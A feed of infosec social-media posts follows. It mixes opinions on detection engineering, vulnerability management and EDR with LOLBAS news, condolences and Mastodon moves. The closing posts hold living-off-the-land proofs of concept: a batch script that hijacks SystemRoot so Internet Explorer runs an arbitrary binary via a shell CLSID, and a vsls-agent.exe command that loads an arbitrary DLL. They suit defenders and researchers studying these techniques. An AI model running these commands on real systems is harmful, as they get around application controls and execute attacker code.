I did a bit of research and learning and have blogged about it an released some code. I wanted to understand Nirvana Hooks, specifically in x86. So I did a thing: https://t.co/EaygKMJmmb https://t.co/8eNYoiJ8Tg

Well well! Microsoft removed the Windows version checks to use AppLocker! Everyone can now use AppLocker! https://t.co/s0gqOJys9M

I love detection engineering, I think it is awesome and hugely needed, and its the future and all that. But I have no idea how to talk about it to a team of 1 (ONE) running a SIEM ...

Repeat after me: vulnerability management is not incident response. We see an RCE a week, why do we randomly select a few to be OMGTHISBAD and scramble? All those other RCEs being discriminated are sad... and still popping you.

Show me a person who blames the EDR, and 9.9 times out of 10 I'll show you someone who doesn't understand: DNS FW rules Noisy Dev jobs GPO Gapping Bad config Scanners You need something on your endpoints that auto-blocks crud, but you still have to fix your internal problems.

Technically unemployed for a few days. New adventures await starting Monday!

Priorities are not what you say, they are what you fund. Culture is not what you say, it's what you reward. Action is a lie detector.

Once men turned their thinking over to machines in the hope that this would set them free. But that only permitted other men with machines to enslave them.

@HackingLZ Some immature companies (ex; no SIEM or whatever) tend to go for RTs before PTs for leverage. mainly to get management to take a seat in the same room, listen, and take security more seriously ($$$).

I guess the general points are: - We need more people to contribute to the profession - We need to encourage people to share (coaching and validation are acceptable) - The community that shares defensive content is smaller IMO. It would be great to see others in this space

The leap that it takes to publicly share infosec knowledge/content is generally underappreciated. Often, folks who want to share with the community do not out of anxiety/fear of acceptance/etc. And then, there is the asymmetry of those who share offensive content vs defensive.

Be a perpetual student. Expertise is a snapshot in time that eventually fades away.

#LOLBAS hit 5000 stars on GitHub to bring in the New Year! Thank you all for the support over the years - it truly is a community project! Big shout out to @Oddvarmoe🙏, @xenosCR, @ConsciousHacker, @liamsomerville, @Wietze, and @_josehelps for all the hard work to keep it going!

This is bad. What about accounts of the deceased? Things that should remain part of the public record?

Stealing passwords from infosec Mastodon - without bypassing CSP https://t.co/kXIqj3tpAU

Intel 471 is deeply saddened by the tragic news of Vitali Kremez's untimely passing. We extend our deepest condolences to his family, friends and his Advance Intelligence Team during this challenging time.

Not saying I'm moving but just in case, I joined mastodon as: https://ioc[.]exchange/web/@xenoscr Anyone that I follow here or who follows me, I'd be happy to connect.

Good life lesson: Hurt people, hurt people. Took me awhile to not worry or care about the people that aren’t happy for others successes or for others positivity to help people or make a positive difference in others lives. They are the unhappy ones. I hope they find happiness.

POC: mkdir %temp%\System32 FOR /R C:\Windows\System32\ %F IN (*.dll) DO COPY "%F" %temp%\System32\ /Y >NUL set a=C:\Windows\System32\calc.exe copy %a% %temp%\System32\rstrui.exe /Y > NUL set SystemRoot=%temp% start iexplore shell:::{3f6bc534-dfa1-4ab4-ae54-ef25a74e0107}

Have you ever considered Internet Explorer to be a #lolbin? By navigating to URI: `shell:::{3f6bc534-dfa1-4ab4-ae54-ef25a74e0107}` you can spawn `rstrui.exe` (System Restore). If you modify the `SystemRoot` environment variable and copy over DLLs you can run whatever you like.

The "Visual Studio Live Share" binary is a fun #LOLBIN to load an arbitrary DLL from the cmdline: vsls-agent.exe --agentExtensionPath c:\path\to\your.dll